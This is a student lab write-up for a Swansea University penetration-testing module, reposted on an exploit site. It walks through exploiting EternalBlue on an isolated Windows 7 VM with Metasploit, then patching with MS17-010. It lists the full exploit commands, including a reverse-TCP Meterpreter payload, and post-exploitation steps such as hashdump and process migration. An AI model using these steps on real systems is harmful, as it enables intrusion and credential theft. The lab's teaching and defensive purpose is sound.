Share
## https://sploitus.com/exploit?id=6A8FA72A-E9AB-5A75-A2EC-999C2C0750F2
# EternalBlue-DoublePulsar-Exploit-Demonstration
Cybersecurity lab demonstrating exploitation of CVE-2017-0144 (EternalBlue) using Metasploit against a vulnerable Windows 7 VM, achieving SYSTEM-level access via Meterpreter. Includes full attack chain, post exploitation, and mitigation via MS17-010 patching, tested in an isolated ethical lab environment.
**Module:** CSCM828 Security Vulnerabilities and Penetration Testing
**Students:**
* Daniel Nicolas Rentapalli (2548048)
* Ichhya Koirala (2607189)
**University:** Swansea University
---
## 1. Overview
This demonstration showcases the exploitation of **CVE-2017-0144 (EternalBlue)** against a vulnerable Windows system, resulting in **unauthenticated remote code execution at kernel level (ring-0)**.
The exploit is executed using the Metasploit Framework and results in the installation of the **DoublePulsar kernel implant**, followed by delivery of a Meterpreter payload.
The demonstration also includes:
* Vulnerability verification
* Successful exploitation
* Post-exploitation activities
* Patch application (MS17-010)
* Exploit failure after patching
---
## 2. System Requirements
### Host System
* VMware Workstation / VirtualBox
* Minimum 8GB RAM recommended
### Attacker Machine
* Kali Linux 2024
* Metasploit Framework 6.x
### Victim Machine
* Windows 7 SP1 x64 (Build 7601)
* **Unpatched (MS17-010 NOT installed)**
---
## 3. Network Configuration
* Network Type: **Host-Only Network**
* Subnet: `192.168.139.0/24`
| Machine | IP Address |
| ------------------ | --------------- |
| Attacker (Kali) | 192.168.139.128 |
| Victim (Windows 7) | 192.168.139.131 |
โ ๏ธ No internet connectivity is required.
โ ๏ธ Environment is fully isolated for ethical compliance.
---
## 4. Victim Setup (Windows 7)
Run the following commands in **Administrator Command Prompt**:
### Disable Firewall
```
netsh advfirewall set allprofiles state off
```
### Verify Firewall Status
```
netsh advfirewall show allprofiles | findstr State
```
### Confirm SMB (Port 445)
```
netstat -an | findstr :445
sc query lanmanserver
```
### Disable Windows Updates
```
sc config wuauserv start= disabled
sc stop wuauserv
```
### Set Static IP
```
netsh interface ip set address "Local Area Connection" static 192.168.139.131 255.255.255.0
```
### Connectivity Test
```
ping 192.168.139.128
```
๐ Take a snapshot named: **Vulnerable-PreExploit**
---
## 5. Attacker Setup (Kali Linux)
### Assign IP Address
```
sudo ip addr add 192.168.139.128/24 dev eth0
sudo ip link set eth0 up
```
### Update Metasploit
```
sudo apt update && sudo msfupdate
```
### Verify Connectivity
```
ping 192.168.139.131
nmap -p 445 192.168.139.131
```
---
## 6. Exploitation Steps
### Step 1: Vulnerability Scan
```
nmap -p 445 --script smb-vuln-ms17-010 192.168.139.131
```
Expected result:
* Host marked **VULNERABLE**
---
### Step 2: Launch Exploit
```
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.139.131
set LHOST 192.168.139.128
set PAYLOAD windows/x64/meterpreter/reverse_tcp
show options
run
```
---
### Step 3: Successful Exploitation
Expected output:
* Meterpreter session opened
* SYSTEM-level access
```
meterpreter > getuid
NT AUTHORITY\SYSTEM
```
---
## 7. DoublePulsar Verification
```
background
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.139.131
run
```
Expected result:
* Host INFECTED
* XOR Key displayed
---
## 8. Post-Exploitation
```
sessions -i 1
getuid
hashdump
ps
migrate
screenshot
shell
whoami
net user
ipconfig /all
```
Demonstrates:
* Credential extraction
* Process migration
* System enumeration
---
## 9. Patch Demonstration (Mitigation)
### Revert Snapshot
Restore: **Vulnerable-PreExploit**
---
### Install Patch (MS17-010)
```
wusa.exe KB4012212-x64.msu /quiet /norestart
shutdown /r /t 0
```
---
### Re-run Exploit
Expected result:
* Exploit fails
* No session created
---
### Verify Patch
```
nmap -p 445 --script smb-vuln-ms17-010 192.168.139.131
```
Expected:
* NOT VULNERABLE
---
## 10. Optional Hardening
### Disable SMBv1
```
reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v SMB1 /t REG_DWORD /d 0 /f
```
---
## 11. Troubleshooting
| Issue | Solution |
| -------------------- | ------------------------ |
| Exploit fails | Check IP configuration |
| No session | Ensure firewall disabled |
| Scan not working | Confirm port 445 open |
| Meterpreter unstable | Retry exploit |
---
## 12. Ethical Considerations
This demonstration is conducted:
* On **author-owned systems only**
* In a **fully isolated lab environment**
* With **no external network access**
Unauthorized exploitation of systems is illegal under:
* UK Computer Misuse Act 1990
---
## 13. Summary
This lab demonstrates:
* Kernel-level exploitation via EternalBlue
* Fileless persistence using DoublePulsar
* Real-world attack replication (WannaCry-style)
* Effective mitigation via patching
---
END OF FILE